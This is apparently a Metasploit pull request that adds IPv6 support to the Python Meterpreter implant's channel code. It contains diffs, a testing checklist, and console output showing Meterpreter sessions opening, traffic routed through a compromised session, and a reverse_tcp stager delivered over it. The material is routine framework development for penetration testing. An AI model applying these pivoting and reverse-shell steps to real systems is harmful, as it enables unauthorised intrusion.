### PR TITLE
Utilize socket.getaddrinfo For IPv6 Channels Support

### DIFF
--- a/python/meterpreter/meterpreter.py
+++ b/python/meterpreter/meterpreter.py
@@ -524,7 +524,7 @@ class MeterpreterSocketUDPClient(MeterpreterSocket):
         peer_host = packet_get_tlv(request, TLV_TYPE_PEER_HOST).get('value', self.peer_address[0])
         peer_port = packet_get_tlv(request, TLV_TYPE_PEER_PORT).get('value', self.peer_address[1])
         try:
-            length = self.sock.sendto(channel_data, (peer_host, peer_port))
+            length = self.sock.sendto(channel_data, self.peer_address)
         except socket.error:
             self.close()
             self._is_alive = False

--- a/python/meterpreter/meterpreter.py
+++ b/python/meterpreter/meterpreter.py
@@ -515,16 +515,22 @@ export(MeterpreterSocketTCPServer)
 
 #@export
 class MeterpreterSocketUDPClient(MeterpreterSocket):
-    def __init__(self, sock, peer_address):
+    def __init__(self, sock, peer_address=None):
         super(MeterpreterSocketUDPClient, self).__init__(sock)
         self.peer_address = peer_address
 
     def core_write(self, request, response):
+        peer_host = packet_get_tlv(request, TLV_TYPE_PEER_HOST).get('value')
+        peer_port = packet_get_tlv(request, TLV_TYPE_PEER_PORT).get('value')
+        if peer_host and peer_port:
+            peer_address = (peer_host, peer_port)
+        elif self.peer_address:
+            peer_address = self.peer_address
+        else:
+            raise RuntimeError('peer_host and peer_port must be specified with an unbound/unconnected UDP channel')
         channel_data = packet_get_tlv(request, TLV_TYPE_CHANNEL_DATA)['value']
-        peer_host = packet_get_tlv(request, TLV_TYPE_PEER_HOST).get('value', self.peer_address[0])
-        peer_port = packet_get_tlv(request, TLV_TYPE_PEER_PORT).get('value', self.peer_address[1])
         try:
-            length = self.sock.sendto(channel_data, self.peer_address)
+            length = self.sock.sendto(channel_data, peer_address)
         except socket.error:
             self.close()
             self._is_alive = False

--- a/python/meterpreter/meterpreter.py
+++ b/python/meterpreter/meterpreter.py
@@ -302,6 +302,8 @@ def get_system_arch():
 
 @export
 def inet_pton(family, address):
+    if family == socket.AF_INET6 and '%' in address:
+        address = address.split('%', 1)[0]
     if hasattr(socket, 'inet_pton'):
         return socket.inet_pton(family, address)
     elif has_windll:


### PR DESCRIPTION
This adds a wrapper around `socket.getaddrinfo` to return the fields in a dictionary, allowing them to be referenced by name instead of index for readability. Additionally, this then uses the new wrapper in the three channel open functions for `tcp_client`, `tcp_server`, `udp_client`. The result is that these functions now properly handle IPv6 addresses.

As a side affect, `%ifacename` can be suffixed to IPv6 addresses when the meterpreter platform is Linux.

## Testing
- [x] Start `msfconsole`
- [x] Get a Python Meterpreter session
- [x] Route all IPv6 traffice through the new session
  - [x] `route add :: :: -1`
- [x] Use the `connect` command from the framework context to establish an IPv6 TCP connection
- [x] Use a payload with one of the `reverse_tcp` stagers
  - [x] `set LHOST ::`
  - [x] `set LPORT 6666`
  - [x] `set ReverseListenerComm` to the last session created (-1 won't work for this option)
  - [x] `to_handler`
  - [x] On the remote host, see that there is an IPv6 socket listening
  - [x] Connect to this socket and receive the stage data from Metasploit

## Example Output
Note that the `connect` command specifies the `wlp4s0` interface as the scope for the link-local address and it only works because the session is established on a Linux host.
```
metasploit-framework (S:0 J:1) payload(python/meterpreter/reverse_tcp) > 
[*] Started reverse TCP handler on 192.168.254.103:4444 
[*] Sending stage (53259 bytes) to 192.168.254.103
[*] Meterpreter session 4 opened (192.168.254.103:4444 -> 192.168.254.103:49028) at 2018-04-08 14:43:48 -0400

metasploit-framework (S:1 J:0) payload(python/meterpreter/reverse_tcp) > 
metasploit-framework (S:1 J:0) payload(python/meterpreter/reverse_tcp) > route add :: :: -1
[*] Route added
metasploit-framework (S:1 J:0) payload(python/meterpreter/reverse_tcp) > connect fe80::621a:d913:2d91:fae4%wlp4s0 6666
[*] Connected to fe80::621a:d913:2d91:fae4%wlp4s0:6666
test
metasploit-framework (S:1 J:0) payload(python/meterpreter/reverse_tcp) > set LHOST ::
LHOST => ::
metasploit-framework (S:1 J:0) payload(python/meterpreter/reverse_tcp) > set ReverseListenerComm 4
ReverseListenerComm => 4
metasploit-framework (S:1 J:0) payload(python/meterpreter/reverse_tcp) > set LPORT 6666
LPORT => 6666
metasploit-framework (S:1 J:0) payload(python/meterpreter/reverse_tcp) > to_handler 
[*] Payload Handler Started as Job 8
metasploit-framework (S:1 J:1) payload(python/meterpreter/reverse_tcp) > 
[*] Started reverse TCP handler on :::6666 via the meterpreter on session 4
[*] Sending stage (53259 bytes) to 
[*] Meterpreter session 5 opened (192.168.254.103-192.168.254.103:6666 -> 127.0.0.1) at 2018-04-08 14:44:55 -0400
```
